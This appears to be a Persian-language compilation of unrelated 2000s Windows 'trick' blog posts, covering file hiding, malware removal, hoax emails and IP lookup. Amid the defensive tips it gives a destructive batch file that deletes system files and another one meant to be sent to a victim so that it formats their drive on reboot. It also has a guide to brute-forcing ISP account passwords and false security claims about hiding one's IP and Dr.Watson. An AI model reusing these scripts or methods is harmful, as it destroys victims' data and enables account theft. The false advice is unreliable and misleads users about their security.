در این ترفند قصد داریم به معرفی ترفندی بپردازیم که با بهره گیری از آن میتوان یک فایل یا یک فولدر را در داخل یک عکس مخفی ساخت! به شکلی که پس از مخفی سازی شما تنها یک عکس خواهید داشت و تنها با باز کردن عکس توسط خود نرم افزار WinRar میتوان به فایل دسترسی داشت!!!. از این ترفند میتوان به عنوان یک شیوه بسیار حرفه ای مخفی سازی فایل و فولدر نام برد.
برای این کار:
شما به یک فایل تصویر با فرمت GIF و یا JPG و همچنین فایل یا فولدری که میخواهید مخفی کنید نیاز خواهید داشت.
ابتدا باید باید فایل یا فولدر مورد نظر را توسط خود نرم افزار WinRar فشرده سازی کنید. بدین منظور روی آن راست کلیک کرده و Add to archive را انتخاب کنید.
محض نمونه نام آن را blofablogfa.rar بگذارید.
اکنون این فایل فشرده که قصد مخفی سازی آن را دارید را در کنار تصویر مورد نظر خود که به عنوان مثال iruncooir.jpg نام دارد قرار دهید.
یعنی این دو فایل در کنار هم و در یک پوشه.
حال ، از منوی Start وارد Run شده و دستور cmd را وارد کرده و Enter بزنید تا وارد Command Prompt شوید.
اکنون در داخل CMD به فولدری که این دو فایل در آن قرار دارد مراجعه کنید. (یادآوری میشود برای تعویض دایرکتوری در CMD از دستور cd استفاده میشود.)
برای اینکه زیاد در داخل درایوها در Cmd مسیر طی نکنید بهتر است آن را وسط یکی از درایوها قرار داده و نام درایو نوشته دونقطه (سمیکالن" :") بگذارید.
بعنوان مثال:
d: و اینتر
پس از مراجعه به دایرکتوری مورد نظر ، کافی است کد زیر را در CMD وارد کرده و Enter بزنید:
copy /b iruncooir.jpg + blofablogfa.rar irun.coo.ir.jpg
در کد فوق iruncooir.jpg نام عکس اولیه ، blofablogfa.rar نام فایل فشرده که قصد مخفی سازی آن را داریم و در پایان irun.coo.ir.jpg نام عکس تولیدی جدید است که فایل فشرده در آن مخفی میشود.
حالا کافی است به فولدری که فایلها در آن موجود بود مراجعه کنید ، یک عکس با نام irun.coo.ir.jpg ایجاد شده است. تصویر این عکس همان عکس اولیه است ، اما در داخل این عکس جدید فایل فشرده ما نیز مخفی شده است که به هیچ وجه قابل مشاهده نیست!
اما برای دستیابی به فایل مخفی شده کافی است روی عکس تولید شده راست کلیک کرده و از Open with روی Choose Program کلیک کنید. در صفحه باز شده از میان لیست برنامه ها WinRar را انتخاب نموده و OK کنید. خواهید دید که نرم افزار WinRar عکس شما را به گونه ای اجرا میکند که فایل مخفی شده در دل عکس نیز پدیدار میگردد! حالا کافی است در WinRar دکمه Extract to را بزنید تا فایل فشرده از دل عکس خارج گردد.
همان طور که ذکر شد این روش یک روش بسیار حرفه ای برای مخفی سازی فایل و فولدر میباشد.
خیلی اوقات پیش می آید که کامپیوتر شما دچار ویروسی می شود که امکان اسکن و تشخیص آن توسط آنتی ویروس وجود ندارد و یا آنکه ویروس با تشخیص نصب بودن آنتی ویروس بروی سیستمتان عملکرد آن را دچار اختلال می کند و مانع از این می شود که شما بتوانید از آنتی ویروس خود برای اسکن کامپیوتر استفاده کنید. در این شرایط چه باید کرد؟
آیا راهی وجود دارد که بتوان در این شرایط کامپیوتر را خودمان اسکن کنیم و مشکل به وجود آمده در آنتی ویروس را برطرف کرد؟ پاسخ تمامی این سوالات مثبت است! در این ترفند قصد داریم به معرفی روشی ابتکاری و در عین حال کاربردی بپردازیم که با استفاده از آن میتوانید کامپیوتر خود را شخصأ اسکن کنید و ویروس موجود را پاک کنید ، بدون بهره گیری از هیچ نوع آنتی ویروسی!
اولین قدم برای اسکن کردن کامپیوترتان نمایش فایل های مخفی در کامپیوتر می باشد.
برای انجام این کار : ابتدا با مراجعه به My Computer بروی منوی Tools کایک کنید و از منوی حاصل بروی عبارت Folder Options کلیک کنید. سپس بروی برگه View کلیک کنید و در این برگه تیک کنار عبارت های Show Hidden Files and Folders را فعال کنید و تیک کنار عبارت Hide Extensions For Known File Types را بردارید و بروی عبارت OK کلیک نمایید.
اینک از طریق مسیر C:/Windows/system32 به پوشه System32 مراجعه کنید. پس از ورود به پوشه system32 بروی منوی View کلیک کنید و از منوی حاصل عبارت Details را انتخاب کنید.
حال در پوشه system32 بروی جدا کننده Date Modified کلیک کنید و آنرا به سمت راست بکشید به طوری که تاریخ تمامی فایل ها یه طور کامل نمایش داده شود.
فایل های نمایش داده شده در پوشه system32 فایل های سیستمی مربوط به ویندوز می باشد که اکثرا با پسوند dll می باشد و این بخش معمولا مورد هدف ویروس ها و Spyware قرار می گیرد و خود را در بین این فایل ها مخفی می کنند.
اگر دقت کنید متوجه خواهید شد که اکثر این فایلهای قرار گرفته در این بخش دارای یک زمان مشخص می باشد و این زمانها (مثلا 8/10/2004) معرف این می باشد که مایکروسافت در این تاریج برنامه مربوط به فایل مورد نظر را به پایان رسانیده است و در واقع این زمان ها هیچ ربطی به زمان نصب ویندوز ندارد.
حال اگر ویروس و یا spyware به این بخش حمله کند زمان آن با زمان فایل های سیستمی موجود در پوشه system32 مطابق ندارد و زمانی جدید تر از زمان مربوط به فایلهای سیستمی ویندوز خواهد بود و به راحتی از طریق مشاهده زمان های قرار گرفته در Date Modified قابل تشخیص می باشد. البته نکته بسیار مهم که باید توجه شود این است که نصب یک سخت افزار جدید و یا یک نرم افزار خاص می تواند فایلی را در این بخش کپی کند که زمان آن با زمان فایل های سیستم مطابق ندارد.
پس برای اینکه فایلی را در این بخش به اشتباه پاک نکنید روشی را مطرح میکنیم که این اشتباه رخ ندهد:
اگر میان فایل های واقع در پوشه system32 به فایلی برخورد کردیدکه تاریخ آن با تاریخ فایل های سیستمی ویندوز مطابقت نداردبروی این فایل کلیک راست کنید و گزینه Properties را انتخاب نمایید.
سپس در پنجره Properties بروی برگه Version کلیک کنید و در این برگه نام کمپانی و ورژن فایل مورد نظر را مطالعه کنید.
اگر اطلاعات این فایل شامل نام کمپانی و خیلی اطلاعات دیگر برایتان آشنا نبود نام فایل مورد نظر را در موتور جستجو گر گوگل تایپ کنید و اگر در نتایج جستجو به این اشاره شده بود که این فایل ویروس است حتما آن را پاک کنید ولی اگر در نتایج جستجو به آلوده بودن این فایل اشاره نشده بود این فایل به واسطه یک سخت افزار و یا نرم افزاری به وجود آمده است.
به نقل از صبحونه
در زیر به برخی از ویژگی های این ویروس اشاره می کنیم :
1 . Folder Options را حذف می کند !
2 . Registry Tools را قفل می کند !
3 . Task Manager نمی تواند فایل های مربوط به این ویروس را End کند !
4 . پس از اجرا شدن ، محتویات My Documents را نمایش می دهد !
5 . اگر در کادر محاوره ای Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تایپ کنید ، سیستم بلافاصله Restart می شود !
6 . اگر روی گزینه ی Log Off یا Turn Off Computer کلیک کنید ، سیستم Restart می شود !
7 . آیکون این ویروس شبیه آیکون یه پوشه است !
همانطور که می دانید فایل های lsass.exe ، winlogon.exe و services.exe از فایل های سیستمی بوده و همیشه در حال اجرا هستند ...
اگر شما برنامه ی Process Master را اجرا کنید ، می بینید که این فایل ها در پوشه ی System32 قرار دارند .
اما اگر ویروس BronTok.A روی سیستم شما نصب باشد ، خواهید دید که سه تا فایل دیگر با همین نام ها در حال اجرا هستند !!
یعنی دو تا winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتی میشود فهمید که کدام ویروسند و کدام فایل اصلی ویندوز ...
آن سه تا فایلی که مربوط به ویروس میشوند ، در پوشه ای غیر از System32 قرار دارند .
مسیر دقیقشان میشود :
C:\Documents and Settings\User\Local Settings\Application Data
C نام همان درایویست که ویندوز در آن نصب گردیده و User نام کاربری است که ویروس در آن اجرا شده ...
بعد از اینکه با نرم افزار Process Master متوجه شدید که کدام ویروسند ، باید آن ها رو Kill process کنید .
اگر احیانا فایل های دیگری با نام های inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .البته به شرطی که مسیرشان غیر از
System32 باشد ...
حالا وقت آن است که از نرم افزار Kill BronTok.A استفاده کنید .
پس از اینکه نرم افزار Kill BronTok.A کارش تمام شد ، آن را ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .
در سمت چپ روی گزینه ی All files and folders کلیک کنید .
در فیلد All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .اکنون تمام فایل های پیدا شده را پاک کنید .
دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
scr،*.exe.*
اکنون از بین فایل های پیدا شده ، هر فایلی که آیکونش شبیه آیکون پوشه بود رو پاک کنید .
مجددا در فیلد All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
job.*
تمام فایل های پیدا شده را پاک کنید .
با سلام خدمت تمام دوستان عزیز این بار می خواهم شما دوستان رو با یک تروجان آشنا کنم .
meus amigos.
MSWinupd
MSWinupd
طریقه بدست آوردن IP یک سایت از طریق فرمان ping
با این کار شما می توانید IP یک سایت مثل یاهو رو پیدا کنید.از منوی start وارد Run شده و تایپ کنید cmd حالا تایپ کنید ping yahoo.com چند لحظه بعد IP سایت یاهو به شما نشان داده می شود.شما می توانید آدرس هر سایت دیگری را به جای yahoo.com وارد کنید.همچنین لازم نیست که در ابتدای آدرس سایت www را بنویسید.
فهمیدن IP خود هنگام اتصال به اینترنت
برای این کار بعد از اتصال به اینترنت بر روی علامت اتصال به اینترنت(دو مانیتور کوچک در سمت راست Task bar) دابل کلیک کنید و سپس در پنجره باز شده از بالا به قسمت Details بروید در آنجا شما می توانید آدرس IP خود را مشاهده کنید. در ویندوز های قدیمی از قسمت استارت به Run رفته و تایپ کنید winipcfg و سپس Enter رابزنید.
طریقه بدست آوردن user name کارت اینترنت
من ابتدا برای شما یه مثال میزنم.من دوتا user name از یک isp برای شما مثال میزنم.h6m9jb و n3m9je خوب اگه دقت کنید می بینید که هر دو از 6 کاراکتر تشکیل شده است.اگه یه کم دقت کنید،می بینید.که حرف های m9j در هر دو ثابت است.(n3m9je و h6m9jb) به این ترتیب شما می توانید درصد حدس زدن user name رو بالا ببرید.این آموزش برای مواقعی مثل نرم افزاری برای هک isp به کار می رود.شما می توانید به این ترتیب و با استفاده از هوش هکری خود راه های دیگری را هم کشف کنید. راستی به قسمت های دیگه کارت نگاه کنید شاید تونستید یه چیزایی بفهمید.
نرم افزاری برای هک isp
می خواهم نرم افزاری رو برای پیدا کردن اکونت اینترنت بذارم: اسم این نرم افزار Unsecurev1.2 است.به کمک این نرم افزار شما می توانید پسورد کارت اینترنت رو بدست بیاورید. البته بهتون بگم که این نرم افزار برای isp هایی است که پورت 21 و یا 79 اونا باز هست. ابتدا نرم افزار رو از لینک زیر دانلود کنید.خوب بعد از دانلود و اجرای برنامه در قسمت computer name or IP آدرس سایت دارنده کارت اینترنت و یا IP اون رو بنویسید.البته به نظر من اگه IP سایت رو بنویسید بهتره.طریقه پیدا کردن IP سایت راهم که در بالابه شما آموزش دادم.در قسمت Port هم یکی از پورت های 21 و یا 79 رو وارد کنید.با قسمت current password هم کاری نداشته باشید.در قسمت user nameهم باید یک user name حدس بزنید. میرسیم به قسمتی که باید کنار گزینه ها را علامت بزنید.در قسمت اول اگه یه لیست پسورد درست کردید کنار این گزینه رو علامت بزنید البته راحت ترید که اینو علامت نزنید.سه قسمت بعدی باید کنارشان حتما علامت باشد.دومی برای اینه که نرم افزار با قدرت بیشتری به دنبال پسورد بگرده.سومی برای اینه که ارتباط شما به کامپیوتر سرور قطع نشه.چهارمی هم برای اینه که هر صد مرتبه تغییراتو save می کنه.این هم حتما تیک بزنید. در مرحله آخر شما مشخص می کنید که پس وررد از حرف تشکیل شده و یا عدد و یا هر دو .شما می توانید این رو از نمونه ی کارت قبلی خود بفهمید.پس تنظیمات این قسمت رو خوب درست کنید.حالا در قسمت Number of characters to start on شما مشخص میکنید که پسورد از چند کاراکتر تشکیل شده.این را هم با نگاه کردن به نمونه قبلی کارت خود می توانید بفهمید.حال روی قسمت connect کلیک کنید و منتظر باشید تا پسورد در مانیتور شما ظاهر بشه. (به نقل از وبلاگ کشکول)
یکی از ساده ترین روشهای هکرها و ویروس نویسان ، استفاده از پست الکترونیکی یا ایمیل برای به خطر انداختن امنیت کاربران است. این روش هر اندازه که ساده صورت میگیرد به همان سادگی نیز قابل تشخیص است. چرا که تنها با متون خاص شما را ترقیب به دریافت فایل الصاقی یا کلیک روی یک لینک میکنند. در این ترفند قصد داریم دست این افراد را برای شما رو کنیم تا دیگر به ساده ترین شکل دچار مشکلات امنیتی نشوید.
يك مشكل بسيار گسترده در اينترنت وجود دارد و آن پيغامهاي الكترونيكي كه در مورد يك ويروس هشدار مي دهند و اين هشدار در مورد يك email با يك عنوان ( subject ) مشخص مي باشد كه اين email ها ويروس هاي خطرناك هستند و به كامپيوتر شما آسيب مي رسانند.
مثال:
Please do not open up any mail that has this title.
It will erase your whole hard drive. This is a new
e-mail virus and not a lot of people know about
it, just let everyone know, so they won't be a victim.
Please forward this e-mail to you friends!!!
Remember the title: JOIN THE CREW.
مثال ديگر:
Subject: VIRUS WARNING VERY IMPORTANT
Please read the following message we received from a client.
If you receive an email titled "It Takes Guts to Say 'Jesus'"
DO NOT open it. It will erase everything on your hard drive. So, you must delete it.
Forward this E-MAIL out to as many people as you can. This is a new, very
malicious virus and not many people know about it. This information was
announced yesterday morning from IBM; please share it with everyone
that might access the internet. Once again, pass this along to EVERYONE in
your address book so that this may be stopped. AOL has said that this is
a very dangerous virus and that there is NO remedy for it at this time.
Please practice cautionary measures.
اگر شما email اي مانند اين ديديد آن را براي كسي نفرستيد! ويروسهاي "Jion The Crew" و "It Takes Guts to Say 'Jesus'" شوخي هستند! ويروسهاي شوخي ديگري وجود دارند مانند:
"Win a Hliday" , "AOL4Free" , "Pen Pal Greetings", "ghost" , "Deeyenda"
و بد نام ترين آنها "Good times" است.
ويژگيهاي اخطار ويروسهاي شوخي:
-
تأكيد بسيار
-
يك هشدار كه ويروس فقط با باز كردن پيغام فعال مي شود ( شما نمي توانيد فقط با باز كردن يك پيفام آلوده شويد مگر اينكه يك پيوست ( attachment ) را باز كنيد.
-
كلمات « اين يك ويروس جديد است كه بسياري از مردم آن را نمي شناسند » در آن ديده مي شود
-
دستور العملها به شما مي گويند كه با دنبال كردن يك لينك آن را برايكسانيكه مي شناسيد بفرستيد.
-
با اشاره به اينكه ويروس روز قبل بوسيله يك شركت يا گروه كامپيوتري معتبر مانند "IBM" يا "Microsoft' و يا ... اعلام شده است مي خواهند هشدار خود موجه جلوه دهند.
در اينجا يك مثال از يك هشدار حقيقي در مورد ويروس وجود دارد:
Hi all,
There is a virus (a "worm", actually) currently doing the rounds that
comes packaged in a file called PrettyPark.exe attached to an email.
Apparently it has been around since May last year, but has proliferated
recently and is currently by far the most "popular" subject of enquiries
at Symantec's anti-virus research center.
The usual rules apply: don't open it.
Information (including a fix if you are infected) is available at this
site:
http://www.symantec.com/avcenter/venc/data/prettypark.worm.html
Good luck, Take care.
ويژگيهايي كه نشان مي دهند اين ويروس مربوط به يك ويروس واقعي است عبارتند از :
-
پيغام به شكل ساده و زبان منطقي و مستدل بيان شده است ( بدون هيچگونه بزرگنمايي در لغات )
-
پيغام در مورد باز كردن يك بايل الصاقي ( attachment ) هشدار ني دهد
-
پيغام آدرس سايت معتبري را مي دهد كه در آن مي توانيد در مورد ويروس اطلاعات بيشتري پيدا كنيد.
-
در پيغام اطلاعاتي در مورد اينكه اگر كامپيوتر شما آلوده به ويروس شد چه كار بايد انجام دهيد به شما اطلاعاتي ميدهد.
-
در پيغام از شما خواسته نمي شود كه آن را براي كسي بفرستيد.
یکی از مشکلاتی که کاربران به ویژه کاربران ایرانی دارند استفاده از آنتی ویروس ها برای اسکن کردن سیستم خود از وجود ویروس است. مشکلاتی از قبیل حجم زیاد نرم افزارهای آنتی ویروس ، نیاز به کرک کردن برای استفاده کامل و ... . در این ترفند قصد داریم چندین سرویس آنلاین را به شما معرفی کنیم که با بهره گیری از آنها میتوانید بدون نیاز به نرم افزار آنتی ویروس خاصی ، سیستم خود را از طریق اینترنت و به شکلی کاملأ رایگان اسکن کنید.
برای استفاده از این سرویس ها ، کافی است به سایتهای زیر رفته و از قابلیتهای موجود استفاده کنید:
McAfee FreeScan
Panda ActiveScan
Kaspersky lab
Bitdefender
RAV
Trend Micro
SYGATE
AuditMyPc
Shields UP!!
VIRUS SCANNERS ON-LINE
Free Antivirus Removal Tools
شاید 15 سال پیش، هیچ كس گمان نمیكرد كه كدهاي مخرب تا اين حد در سادهترين كارهاي روزمره ما نيز دخالت كنند.
آن روزها وقتي يك ويروس جديد طراحي و خلق ميشد، انتشار آن، هفتهها و يا حتي ماهها طول ميكشيد؛ چرا كه يك فلاپي ديسك ميتواند وسيلهاي سريع براي انتشار ويروسها نباشد!!
فناوريهاي مورد استفاده براي حفاظت سيستمها در برابر اين ويروسهاي ماقبل تاريخ بسيار ساده و ابتدايي بودند، درست هماهنگ با فناوريهاي مورد استفاده براي طراحي، خلق و انتشار اين ويروسها.
بنابراين در آن زمان، تعدادي روش محدود و ابتدايي براي مقابله با تهديدات رايانه اي و قابل قبول بودن سطح شرايط ايمني سيستمها كفايت مينمود.
اما اكنون ساختار و نحوه طراحي ويروسها بسيار پيچيدهتر شده است. هكرها قدرتمند و توانا شدهاند و عرصههاي جديدي را فتح كردهاند مانند پست الكترونيك و نيز فناوري ويروسهايي كه بدون نياز به باز شدن پيغامها از طرف كاربر به طور خودكار منتشر ميشوند.
اكنون ويروسهايي وجود دارند كه ميتوانند رايانهها را آلوده كنند فقط به اين دليل ساده كه كاربر به اينترنت متصل شده است.
هركدام از اين مراحل طي شده توسط هكرها، نشان دهنده روند رو به رشد آنان در استفاده از فناوريهاي جديد براي طراحي، خلق و انتشار ويروسها بوده است.
بنابراين براي حفاظت سيستمها در مقابل اين كدهاي مخرب، روشهاي نوين منطبق بر فناوريهاي جديد لازم است.
براي نمونه اگر نامههاي الكترونيكي منبع بالقوه تهديدات باشد، بررسي و جستوجوي مستمر يك برنامه ضدويروس، بايد نقل و انتقالات اطلاعاتي POP3 را نيز دربربگيرد.
اما امسال، سال 2006، واقعاً چه اتفاقاتي در حال رخ دادن است؟ آيا ما شاهد انقلابهاي جديد در فناوريهاي مربوط به طراحي وخلق كدهاي مخرب خواهيم بود؟
هرگز. شايد بشود گفت كه طراحان كدهاي مخرب در خلاقيت و فناوري، حتي يك گام هم به عقب برداشتهاند. روشهاي استفاده شده براي انتقال و انتشار كدهاي مخرب در رايانهها، كمي ابتداييتر نيز شدهاند. مدت زماني است كه از ايدههاي خلاق و پي درپي براي نفوذ در سيستمها مانند استفاده از روشهاي EPO (Entry Point Obscuring) و آلوده كردن فايلهاي PE ويندوز اثري نيست.
پيشرفته ترين روشها در حال حاضر از يك rootkit استفاده ميكنند كه چه از نوع تجاري و چه از نوع غيرتجاري، اغلب اوقات توسط يك طراح حرفهاي ويروس، خلق نميشوند.
خلاقيت و پيشرفت بسيار دشوار است و نياز به تلاش فراوان و تخيل خلاق دارد كه گمان نميرود طراحان ويروس داراي چنين ويژگيهاي مثبتي باشند!!
شركتهاي امنيتي نيز به نوبه خود همواره در حال پژوهش، بررسي، طراحي و توليد فناوريهاي قدرتمند و مؤثر در مقابله با هكرها هستند و به نظر ميرسد كه امنيت و حفاظت گوي سبقت را از طراحان كدهاي مخرب ربوده است و از لحاظ تكنولوژي درجايي بالاتر از آنها ايستاده است.
استراتژي جديد هكرها، روي استفاده از فناوريها و خلاقيتهاي نوين تمركز نميكند، بلكه جهتگيري آن به سمت رشد ارتكاب جرمهاي اينترنتي است.
تا چند سال قبل طراحان و خالقان ويروس به خود ميباليدند از اينكه ويروسهاي ساخت آنها تا چه حد درسطح انتشار و تخريب موفق عمل ميكردند. اما اكنون در خصوص مبالغي كه از طريق كلاهبرداريهاي اينترنتي به سرقت ميبرند به خود ميبالند.
براي دستيابي به اين هدف، آنها نيازي به تلاش فراوان و دانش پيشرفته براي تحليل APIها و آشنايي با سيستمهاي جديد تخريب ندارند.
يك روش قديمي و نخ نما براي فريب كاربر نيز كافي است كه پول وي به سرقت رود.
در دهه 30 در ايالات متحده آمريكا، فروشندهاي اعلام كرد كه روش قطعي مبارزه با آفات سيب زميني را يافته و حاضر است آن را با قيمتي مناسب در اختيار كشاورزان قرار دهد.
بسياري از توليدكنندگان سيب زميني نيز با خريد اين روش موافقت كردند و حتي حاضر شدند مبلغ آن را نيز پيش پرداخت كنند.
پس از پرداخت مبلغ، آنها دو تكه چوب به شكل مكعب مستطيل و به اندازه پاكت سيگار دريافت كردند. در راهنماي روش قاطع دفع آفات سيب زميني ذكر شده بود كه آنها ميبايست يك حشره را گرفته، آن را روي يكي از تكههاي چوب گذاشته و با چوب ديگر روي آن ضربه بزنند تا آن حشره از بين برود و آنها بايد تا دفع كامل آفات اين عمل تكرار كنند!!
بله؛ اين فقط يك شگرد تبليغاتي فريبكارانه بود.
آيا شباهتي بين اين روش كهنه دهه 30 و روشهاي مورد استفاده طراحان كدهاي مخرب در سال 2006 ديده نميشود؟
با غلبه امنيت و حفاظت بر كدهاي مخرب و ويروسها در عرصه تكنولوژي و دانش، اكنون فناوريهاي امنيتي حفاظتي مبارزه دوم را آغاز ميكنند.
مقابله با كدهاي مخربي كه داراي تكنولوژي پيشرفتهاي نيستند، اما از عملكرد كاربراني كه در دام هكرها گرفتار شدهاند سوءاستفاده ميكنند.
هيچ حفره امنيتي در زمينه امنيت IT از يك كاربر بيتجربه و ساده خطرناكتر نيست. بنابراين فناوريهاي حفاظتي جديد بايد به رفع اين مشكل بپردازند.
از آنجا كه تكنولوژي و دانش هكرها براي مدت زماني است كه متوقف مانده و رو به پيشرفت نميرود، سيستمهاي حفاظت جديد يقيناً قادر خواهند بود تا بسادگي حملات هك را دفع كنند.
قصد داریم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید. با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.
ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس فايل رو با پسوند Bat. ذخیره کنيد.
whois يکی از کارهائيست که بعد از پيدا کردن IP استفاده ميشود whois جهت جمع اوری اطلاعات در مورد يک Ip بکار ميرود با اين کار شما ميتوانيد مشخص کنيد که اين IP متعلق به چه شرکتی ميباشد و در کدام کشور يا شهر می باشد و يا حتی شماره تلفن ها و ادرس ان شرکت و يا حتی ادرس ايميل صاحب شرکت را که بعضی از site ها اين کار را برای ما انجام ميدهند فرض کنيد شما صاحب يک شرکت متوجه شديد که فلان IP در حال انجام کار بر روی IP شرکت شما می باشد حال برای شناسائی مزاحم خود بايد چه کرد برای اينکه به اطلاع مسئول شرکت دارای ان ip بر سانيم که يکی از IP های شما در چنين ساعتی ايجاد مزاحمت کرده البته اين در صورتی مفيد می باشد که آن شرکت به اين مسائل مقيد باشد و شرکتی باشد که IP های استفاده شده توسط هر user را ثبت کند.
بدین منظور کافی است به وب سایت http://www.dnsstuff.com/ بروید و در قسمت WHOIS Lookup ، آدرس IP مورد نظر را وارد کنید و Enter را بزنید. خواهید دید که تمامی مشخصات IP برایتان نمایان میشود.
شما می توانید با از طریق Notepad ویندوز یک فایل بسازید و آن را برای شخص مورد نظر بفرستید. کافی است فرد مورد نظر فایل را یکبار اجرا کند و آنگاه یکی از درایوهای کامپیوتر فرد ، که شما آن را تعیین کرده اید فرمت خواهد شد!
بدین منظور:
ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال tarfandestan.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.
اما به چند نکته توجه کنید:
عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :c به جای c نام درایو مورد نظر را بنویسید.
دقت هم کنید که ابدأ به روی فایلی که ساخته اید کلیک نکنید ، چرا که آنوقت باید با درایو خودتون خداحافظی کنید!
اما به نظر شما این فایل چگونه کار میکند؟
روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه ، به همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.
در پایان به این نکته توجه داشته باشید که این مطلب تنها جنبه آموزش داشته و هر گونه استفاده ناصحیح از آن بر عهده خود فرد میباشد!
در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده میکنند. با استفاده از این ترفند میتوانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان رو از دسترس دیگران مخفی نگه دارید.
برای این کار:
1- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.
2- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.
3- در پنجره باز شده بر روی دکمه Add کلیک کنید.
4- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.
5- سپس Finish را زده و خارج شوید.
6- در پنجره قبلی بر روی Ok کلیک کنید.
7- حال در همان محیط اولیه هستید. در حال حاضر آیکون کناری عبارت IP Security Policy Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.
8- در پایان از منوی File به Exit رفته و با انتخاب Yes این عملیات را ذخیره کنید.
ممکن است شما نیز تا به حال نام Dr.Watson ویندوز XP را شنیده باشید. ابزاری که همیشه در پس ویندوز بوده است و بسیاری از کاربران از توانایی های این برنامه مفید بی خبرند.
شما به وسيله اين برنامه ميتوانيد به راحتي ريشه مشكلات بسيار جدي را كه در سيستم ها اغلب باعث قفل كردن دستگاه و ... ميشود ، رديابي كنيد و بعد براي رفع مشكل اقدام كنيد. با استفاده از این ابزار فوق العاده میتوانید بدون نیاز به نرم افزارهای آنتی ویروس و فایروال امنیت سیستم خود را تضمین کنید.
شما به وسيله اين برنامه ميتوانيد به راحتي ريشه مشكلات بسيار جدي را كه در سيستم ها اغلب باعث قفل كردن دستگاه و ... ميشود ، رديابي كنيد و بعد براي رفع مشكل اقدام كنيد.
هنگامي كه شما برنامه Dr.Watson را اجرا كنيد ، اين برنامه در پس زمينه قرار ميگيرد و منتظر به وجود آمدن يك مشكل در سيستم شما ميماند تا جزئيات آن را ثبت كند ( آيكن اين برنامه در نوار وظيفه قرار ميگيرد ). بسياري از افراد فكر ميكنند كه به اين برنامه در ويندوز XP نياز پيدا نخواهند كرد چون اين ويندوز نسبت به ويندوزهاي قبلي خود بسيار پايدارتر و مستحكم تر است و خوب همه اين موضوع را قبول دارند. اما با تمام اين پايداري بازهم امكان دارد ناگهان مشكل جدي اي براي ويندوز XP نيز پيش بيايد. اگر شما در آن هنگام اين برنامه را اجرا كرده باشيد ميتوانيد به راحتي مشكل را رد يابي كرده و پس از حل آن ديگر نگران به وجود آمدن چنين مشكلي نباشيد. پس بهتر است هميشه به فكر باشيد تا بعدا پشيمان نشويد.
برنامه Dr.Watson تمامي اطلاعات وابسته به سيستم را درست قبل از اينكه خطا و مشكل اتفاق بيفتد ضبط ميكند. به عبارت ديگر اگر سيستمتان از حركت ايستاد و يا يك خطاي سيستمي جدي را به شما نشان داد ميتوانيد كامپيوتر خود را Restart كرده و بعد به سراغ فايل Log اي كه برنامه Dr.Watson درست قبل از وقوع مشكل ميسازد برويد. اين فايل شامل جزئيات كامل مشكل ميباشد. در اينجا اگر كمي اطلاعات حرفه اي راجع به سيستم و كدهاي سيستمي داشته باشيد ميتوانيد به راحتي مشكل را ريشه يابي و حل كنيد. در غير اين صورت اگر مشكل خيلي جدي باشد شما حتما نياز به يك متخصص خواهيد داشت كه با نشان دادن فايل Log به آن متخصص ، او به راحتي ( در اكثر مواقع ! ) مشكل را براي شما حل ميكند. اما همواره يادتان باشد كه هيچ برنامه اي نميتواند بهترين باشد. برنامه Dr.Watson اگر چه در بسياري از موارد به خوبي از عهده وظيفه خودش بر مي آيد اما گاها نيز ممكن است اگر مشكل سيستم شما خيلي جدي باشد و باعث قفل شدن كل سيستم شما گردد ، نتواند ريشه مشكل را ثبت كند و در گزارشش قيد كند. اما نگران نباشيد چون اين اتفاق ممكن است يك در هزار رخ دهد و اصلا جاي نگراني نيست.
نكته جالب توجه ديگر اين برنامه اين است كه شما با ارسال فايل Log آن براي شركت Microsoft ميتوانيد از راهنماييهاي متخصصان اين شركت نيز براي رفع مشكل خودتان استفاده كنيد. فايل Log برنامه Dr.Watson اغلب خطاها را تشريح كرده و روش درست و منطقي را براي اصلاح و تعمير آن به شما پيشنهاد ميكند اما همواره بهتر است كه از يك فرد متخصص نيز در اين زمينه كمك بخواهيد كه به نظر من متخصصان خود شركت Microsoft ميتوانند بهترين انتخاب شما باشند جون كاملا رايگان اند !
